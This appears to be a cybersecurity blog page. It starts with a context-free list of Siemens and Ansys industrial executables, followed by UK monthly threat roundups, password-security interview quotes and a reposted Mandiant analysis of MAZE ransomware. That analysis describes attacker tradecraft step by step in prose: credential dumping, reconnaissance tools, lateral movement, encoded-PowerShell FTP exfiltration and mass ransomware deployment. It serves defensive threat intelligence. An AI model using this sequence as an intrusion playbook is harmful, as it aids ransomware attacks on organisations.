        CCDELTALOADER.EXE | Siemens
        CCDMRUNTIMEPERSISTENCE.EXE | Siemens
        CCECLIENT_X64.EXE | Siemens
        CCECLIENT.EXE | Siemens
        CCESERVER_X64.EXE | Siemens
        CCESERVER.EXE | Siemens
        CCKEYBOARDHOOK.EXE | Siemens
        CCLICENSESERVICE.EXE | Siemens
        CCNSINFO2PROVIDER.EXE | Siemens
        CCPACKAGEMGR.EXE | Siemens
        CCPERFMON.EXE | Siemens
        CCPROFILESERVER.EXE | Siemens
        CCPROJECTMGR.EXE | Siemens
        CCPTMRTSERVER.EXE | Siemens
        CCREDUNDANCYAGENT.EXE | Siemens
        CCREMOTESERVICE.EXE | Siemens
        CCRT2XML.EXE | Siemens
        CCRTSLOADER_X64.EXE | Siemens
        CCSSMRTSERVER.EXE | Siemens
        CCSYSTEMDIAGNOSTICSHOST.EXE | Siemens
        CCTEXTSERVER.EXE | Siemens
        CCTLGSERVER.EXE | Siemens
        CCTMTIMESYNC.EXE | Siemens
        CCTMTIMESYNCSERVER.EXE | Siemens
        CCUCSURROGATE.EXE | Siemens
        CCWATCHOPC.EXE | Siemens
        CCWRITEARCHIVESERVER.EXE | Siemens
        DA2XML.EXE | Siemens
        GSCRT.EXE | Siemens
        HMIES.EXE | Siemens
        HMIRTM.EXE | Siemens
        HMISMARTSTART.EXE | Siemens
        HMRT.EXE | Siemens
        IPCSECCOM.EXE | Siemens
        OPCUASERVERWINCC.EXE | Siemens
        PASSDBRT.EXE | Siemens
        PDLRT.EXE | Siemens
        PMEXP.EXE | Siemens
        PNIOMGR.EXE | Siemens
        REDUNDANCYCONTROL.EXE | Siemens
        REDUNDANCYSTATE.EXE | Siemens
        S7ACMGRX.EXE | Siemens
        S7AHHLPX.EXE | Siemens
        S7ASYSVX.EXE | Siemens
        S7EPASRV64X.EXE | Siemens
        S7HSPSVX.EXE | Siemens
        S7KAFAPX.EXE | Siemens
        S7O.TUNNELSERVICEHOST.EXE | Siemens
        S7OIEHSX64.EXE | Siemens
        S7OPNDISCOVERYX64.EXE | Siemens
        S7SYMAPX.EXE | Siemens
        S7TGTOPX.EXE | Siemens
        S7TRACESERVICE64X.EXE | Siemens
        S7UBTOOX.EXE | Siemens
        S7UBTSTX.EXE | Siemens
        S7WNRMSX.EXE | Siemens
        S7WNSMGX.EXE | Siemens
        S7WNSMSX.EXE | Siemens
        S7XUDIAX.EXE | Siemens
        S7XUTAPX.EXE | Siemens
        SCORECFG.EXE | Siemens
        SCOREDP.EXE | Siemens
        SCOREPNIO.EXE | Siemens
        SCORES7.EXE | Siemens
        SCORESR.EXE | Siemens
        SCSDISTSERVICEX.EXE | Siemens
        SCSFSX.EXE | Siemens
        SCSMX.EXE | Siemens
        SDIAGRT.EXE | Siemens
        SIEMENS.INFORMATIONSERVER.DISCOVERSERVICEINSTALLER.EXE | Siemens
        SIEMENS.INFORMATIONSERVER.ISREADY.PLUGINSERVICE.EXE | Siemens
        SIEMENS.INFORMATIONSERVER.SCHEDULER.EXE | Siemens
        SIM9SYNC.EXE | Siemens
        SIMNETPNPMAN.EXE | Siemens
        SMARTSERVER.EXE | Siemens
        SSERVCFG.EXE | Siemens
        TOUCHINPUTPC.EXE | Siemens
        TRACECONCEPTX.EXE | Siemens
        TRACESERVER.EXE | Siemens
        UM.RIS.EXE | Siemens
        UM.SSO.EXE | Siemens
        WEBNAVIGATORRT.EXE | Siemens
        WINCCEXPLORER.EXE | Siemens
        CCDMRTCHANNELHOST.EXE | Siemens
        ANSYS.ACT.BROWSER.EXE | Ansys
        ANSYS.EXE | Ansys
        ANSYS192.EXE | Ansys
        ANSYSFWW.EXE | Ansys
        ANSYSLI_CLIENT.EXE | Ansys
        ANSYSLI_MONITOR.EXE | Ansys
        ANSYSLI_SERVER.EXE | Ansys
        ANSYSLMD.EXE | Ansys
        ANSYSWBU.EXE | Ansys
        CONFIGSERVERI64.EXE | Tani
        ENGINELOGGERI64.EXE | Tani
        PLCENGINEI64.EXE | Tani

        Cyber Security Roundup for July 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, June 2020.

        Australian Prime Minister Scott Morrison announced that a sophisticated nation-state actor is causing increasing havoc by attacking the country's government, corporate institutions and critical infrastructure operators. He said, "We know it is a sophisticated state-based cyber actor because of the scale and nature of the targeting and the tradecraft used". While Morrison didn't name the country responsible in his statement, Reuters said its sources confirmed China was the culprit. Political tensions have ramped up between Australia and China in recent months after Australia called for an investigation into China's handling of the COVID-19 pandemic. China then reacted by placing tariffs on Australian exports and banning shipments of beef from Australia.

        Why am I leading a UK cybersecurity blog with an Australian cyberattacks story? Because the UK might well be next in the cross-hairs of China's sophisticated cyber army, after the UK government's stance on using Huawei in 5G infrastructure soured significantly last month, and because of the increasing political pressure applied by the UK government on the Chinese government following its introduction of a controversial new security law in Hong Kong.

        Increased UK Huawei Tensions in June 2020
        While the Australian PM rightly suggested the nation-state threat actor was sophisticated, the cyberattacks described aren't so sophisticated. The attackers engaged in spear-phishing campaigns designed to trick email recipients into clicking a link leading to malicious files or a credential harvesting page, opening malicious attachments, or granting Office 365 OAuth tokens to the actors. This is the same MO as the cyberattacks orchestrated by the cybercriminal fraternity on a daily basis. The Australian government statement advises organisations to patch their internet-facing devices, including web and email servers, and to use multifactor authentication. All good advice; in fact, essential good practice for all organisations to adopt no matter their threat actor landscape.

        Away from the international cyber warfare scene, a coalition led by security companies is urging the UK government to revamp the dated Computer Misuse Act. The UK's 'anti-hacking' law is 30 years old, written well before the internet took root in our digital society, and is not really suitable for prosecuting modern cybercriminals, who tend to be prosecuted under financial crime and fraud laws instead. The coalition calling for a change in the law includes NCC Group, F-Secure, techUK, McAfee and Trend Micro. They argue that section 1 of the Act, which prohibits unauthorised access to any programme or data held in any computer, has not kept pace with advances in technology. In their letter to the PM they said "With the advent of modern threat intelligence research, defensive cyber activities often involve the scanning and interrogation of compromised victims and criminals systems to lessen the impact of attacks and prevent future incidents. In these cases, criminals are obviously very unlikely to explicitly authorise such access."

        Since launching a 'Suspicious Email Reporting Service' in April 2020, the UK National Cyber Security Centre (NCSC) announced it has now received one million reports, receiving around 16,500 emails a day. NCSC Chief Executive Officer Ciaran Martin called the number of reports a “milestone” and “a testament to the vigilance of the British public". I think the email reporting service is another fantastic free service provided by NCSC (i.e. UK Gov) to UK citizens, so one thing the UK government is definitely getting right in the cybersecurity space at the moment.

        Zoom announced it will extend 'optional' end-to-end encryption (E2EE) to free users. It is not certain when exactly Zoom's free E2EE will commence or whether it will be on by default, given the Zoom CEO said, "We plan to begin early beta of the E2EE feature in July 2020." Still, it is good to see the much-criticised Zoom continuing to bolster its security, including by appointing a seasoned Chief Information Security Officer from Salesforce.

        Some men just want to watch the world burn...
        With the recent uptick in ransomware, phishing, unsecured cloud buckets and massive data breaches dominating the media headlines over the past couple of years, you could be forgiven for forgetting about the threat posed by Distributed Denial-of-Service (DDoS) attacks. So then, a timely reminder that some threat actors have vast botnets at their disposal for orchestrating huge DDoS attacks, after Amazon reported thwarting the biggest ever DDoS attack and a European bank suffered the biggest ever packets-per-second (PPS) DDoS attack. The motives of these colossal DDoS attacks are unclear; I guess some men just want to watch the world burn.
        Quote from Batman butler Alfred (Michael Caine), The Dark Knight

          Cyber Security Roundup for June 2020

          A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, May 2020.

          EasyJet's disclosure of a "highly sophisticated cyber-attack", which occurred in January 2020 and impacted 9 million of its customers, was the biggest cybersecurity story of May 2020 in the UK. No details about this 'cyber-attack' were disclosed, other than that 2,208 customers had their credit card details accessed.


          Using terms like "highly sophisticated" without providing any actual details of the cyberattack makes one think back to 2015, when TalkTalk CEO Dido Harding described a cyber-attack as a "significant and sustained cyber-attack". In TalkTalk's case, that cyber attack turned out to be a bunch of teenagers taking advantage of a then 10-year-old SQL injection vulnerability. City A.M. described Dido's responses as "naive", noting that when asked if the affected customer data was encrypted or not, she replied: "The awful truth is that I don't know". Today Dido is responsible for the UK government's Track, Test and Trace application, which no doubt will ring privacy alarm bells with some.

          Back to the EasyJet breach: all we know is that the ICO and the NCSC are supporting the UK budget airline. EasyJet said: "We take issues of security extremely seriously and continue to invest to further enhance our security environment. There is no evidence that any personal information of any nature has been misused, however, on the recommendation of the ICO, we are communicating with the approximately nine million customers whose travel details were accessed to advise them of protective steps to minimise any risk of potential phishing. We are advising customers to be cautious of any communications purporting to come from EasyJet or EasyJet Holidays."

          It will be interesting to see the DPA enforcement line the Information Commissioner's Office (ICO) adopts with EasyJet, especially considering the current COVID-19 impact on the UK aviation industry. Some security commentators have called the ICO a "Toothless Tiger" in regard to its supportive response, a label I've not heard since long before the GDPR came into force. But the GDPR still has a sting in its tail beyond ICO enforcement action in the UK, in that individuals impacted by personal data breaches can bring a class-action lawsuit. So then, it can be no real surprise that law firm PGMBM has announced it has issued a class-action claim in the High Court of London, with a potential liability of an eye-watering £18 billion. If successful, each customer impacted by the breach could receive a payout of £2,000.

          The 2020 Verizon Data Breach Investigations Report (DBIR) was released, the most valuable annual report in the cybersecurity industry in my humble opinion. The 2020 DBIR used data compiled before the COVID-19 pandemic. The report analyses 32,002 security incidents and 3,950 confirmed breaches from 81 contributors across 81 countries.
          • 86% of data breaches were for financial gain, up from 71% in 2019.
          • 43% involved web applications (cloud-based); these attacks have doubled, reflecting the growth in the use of cloud-based services.
          • 67% of data breaches resulted from credential theft, human error or social attacks.
          • Clearly identified cyber-breach pathways enable a "Defender Advantage" in the fight against cyber-crime.
          • On-going patching is working: fewer than 1 in 20 breaches exploited vulnerabilities.
          • The vast majority of breaches (70%) continue to be caused by external actors, with organised crime accounting for 55% of these.
          • Credential theft and social attacks such as phishing and business email compromise cause the majority of breaches (over 67%), specifically:
            • 37% of credential theft breaches used stolen or weak credentials,
            • 25% involved phishing,
            • human error accounted for 22%.
          The 2020 DBIR highlighted a two-fold increase in web application breaches, to 43%, with stolen credentials used in over 80% of these cases. Ransomware saw a slight increase, found in 27% of malware incidents compared to 24% in the 2019 DBIR, with 18% of organisations reporting that they blocked at least one piece of ransomware last year.

          REvil (aka Sodinokibi) hackers are said to have stolen celebrity data from the law firm Grubman Shire Meiselas & Sacks. Some 756 gigabytes of personal data, emails and contract details were taken, relating to Lady Gaga, Madonna, Elton John, Barbra Streisand, Bruce Springsteen and Mariah Carey, to name a few.

          Pitney Bowes was hit with ransomware for the second time in 7 months. Pitney Bowes said attackers breached company systems and accessed "a limited set of corporate file shares" that "contained information used by our business teams and functional groups to conduct business-related activities." News reports state the Maze ransomware group is behind the attack, threatening to post confidential data if Pitney Bowes does not pay up.

          Amazon's UK website was defaced with racist abuse, which appeared on multiple product listings. Amazon has not disclosed how long the racist language remained on the site, but it sparked outrage on Twitter. Amazon said: "We investigated, removed the images in question and took action against the bad actor".

          LogMeOnce, a password identity management suite provider, has published a detailed interview with me titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Password Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.


            Passwords are and have always been an Achilles Heel in CyberSecurity

            LogMeOnce, a password identity management suite provider, has published a detailed interview with me titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Password Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

            Quotes
            “I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

            "There is no silver bullet with password security, but MFA comes close, it significantly reduces the risk of account compromise"

            "The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

            "Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

            "As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

            "The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

            "Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts breakdown the steady stream of data into actionable intelligence, reducing workload and false-positive errors"

            "When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

            Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

            Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

            Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

            The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

            Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

            Victimology

            We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector, including manufacturing, legal, financial services, construction, healthcare, technology, retail and government, has been impacted, demonstrating the indiscriminate nature of these operations (Figure 1).


            Figure 1: Geographical and industry distribution of alleged MAZE victims

            Multiple Actors Involved in MAZE Ransomware Operations Identified

            Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers partner with other actors (i.e. affiliates) who are responsible for distributing the malware; when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement, each of whom appears to work on a percentage basis. Notably, in some cases, actors may be hired on a salary basis (vs. commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


            Figure 2: MAZE ransomware panel

            MAZE Initially Distributed via Exploit Kits and Spam Campaigns

            MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

            On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


            Figure 3: German-language lure

            On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United States. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

            On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


            Figure 4: AT&T email lure


            Figure 5: Canada Post email lure

            Shift to Post-Compromise Distribution Maximizes Impact

            Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and to exfiltrate data, which is then leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge a second fee, separate from the payment for the decryption key, for the non-release of stolen data.

            Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented, meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur because numerous, disparate actors are involved in different phases of these operations. Notably, the time from initial compromise to encryption has also varied widely, from weeks to many months.

            Initial Compromise

            There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

            • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
            • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
            • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
            • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

            Establish Foothold & Maintain Presence

            The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have also observed an actor create their own domain account to enable later-stage operations.

            • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
            • Web shells were deployed to an internet-facing system. The system-level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
            • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
            • An actor created a new domain account and added it to the domain administrators group.

            Escalate Privileges

            Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

            • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
            • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
            • The actor attempted to identify hosts running the KeePass password safe software.
            • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
            • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

            Reconnaissance

            Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents perhaps best highlight the divergent ways in which the responsible actors interact with victim networks.

            • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
            • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
            • Preliminary network reconnaissance was conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
            • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
            • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
            • An actor employed the adfind tool and a batch script to collect information about their network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
            • An actor used the tool smbtools.exe to assess whether accounts could login to systems across the environment.
            • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

            Lateral Movement

            Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

            • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate RDP sessions to enable both lateral movement and privilege escalation.
            • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
            • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
            • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

            Complete Mission

            There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various ways (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

            • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
            • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
            • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
            • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
            • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

            In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

            • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
            • Attackers employed batch scripts and a series of .txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
            • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
            • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
              • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
              • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment.
              • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

            Implications

            Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

            Mandiant Security Validation Actions

            Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

            • A100-877 - Active Directory - BloodHound, CollectionMethod All
            • A150-006 - Command and Control - BEACON, Check-in
            • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
            • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
            • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
            • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
            • A100-887 - Command and Control - MAZE, DNS Query #1
            • A100-888 - Command and Control - MAZE, DNS Query #2
            • A100-889 - Command and Control - MAZE, DNS Query #3
            • A100-890 - Command and Control - MAZE, DNS Query #4
            • A100-891 - Command and Control - MAZE, DNS Query #5
            • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
            • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
            • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
            • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
            • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
            • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
            • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
            • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
            • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
            • A104-052 - Host CLI - Credential Access: Mimikatz
            • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
            • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
            • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
            • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
            • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
            • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
            • A104-493 - Host CLI - Discovery: Enumerate Network Shares
            • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
            • A104-482 - Host CLI - Discovery: Language Query Using reg query
            • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
            • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
            • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
            • A104-027 - Host CLI - Discovery: Process Discovery
            • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
            • A104-029 - Host CLI - Discovery: Remote System Discovery
            • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
            • A104-083 - Host CLI - Discovery: System Info
            • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
            • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
            • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
            • A100-879 - Malicious File Transfer - Adfind.exe, Download
            • A150-046 - Malicious File Transfer - BEACON, Download
            • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
            • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
            • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
            • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
            • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
            • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
            • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
            • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
            • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
            • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
            • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
            • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
            • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
            • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
            • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
            • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
            • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
            • A100-886 - Malicious File Transfer - Rclone.exe, Download
            • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

            Detecting the Techniques

            Platform                                     Signature Name
            MVX (covers multiple FireEye technologies)   Bale Detection
                                                         FE_Ransomware_Win_MAZE_1
            Endpoint Security                            WMIC SHADOWCOPY DELETE (METHODOLOGY)
                                                         MAZE RANSOMWARE (FAMILY)
            Network Security                             Ransomware.Win.MAZE
                                                         Ransomware.Maze
                                                         Ransomware.Maze

            MITRE ATT&CK Mappings

            Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor. The technique IDs below are those of the ATT&CK version current at publication; several of them (e.g. T1086 PowerShell, T1064 Scripting, T1076 Remote Desktop Protocol) have since been reorganized into sub-techniques, so map them before loading these tables into a current ATT&CK Navigator layer.

            MAZE Group 1 MITRE ATT&CK Mapping

            ATT&CK Tactic Category: Techniques

            Initial Access
              T1133: External Remote Services
              T1078: Valid Accounts
            Execution
              T1059: Command-Line Interface
              T1086: PowerShell
              T1064: Scripting
              T1035: Service Execution
            Persistence
              T1078: Valid Accounts
              T1050: New Service
            Privilege Escalation
              T1078: Valid Accounts
            Defense Evasion
              T1078: Valid Accounts
              T1036: Masquerading
              T1027: Obfuscated Files or Information
              T1064: Scripting
            Credential Access
              T1110: Brute Force
              T1003: Credential Dumping
            Discovery
              T1087: Account Discovery
              T1482: Domain Trust Discovery
              T1083: File and Directory Discovery
              T1135: Network Share Discovery
              T1069: Permission Groups Discovery
              T1018: Remote System Discovery
              T1016: System Network Configuration Discovery
            Lateral Movement
              T1076: Remote Desktop Protocol
              T1105: Remote File Copy
            Collection
              T1005: Data from Local System
            Command and Control
              T1043: Commonly Used Port
              T1105: Remote File Copy
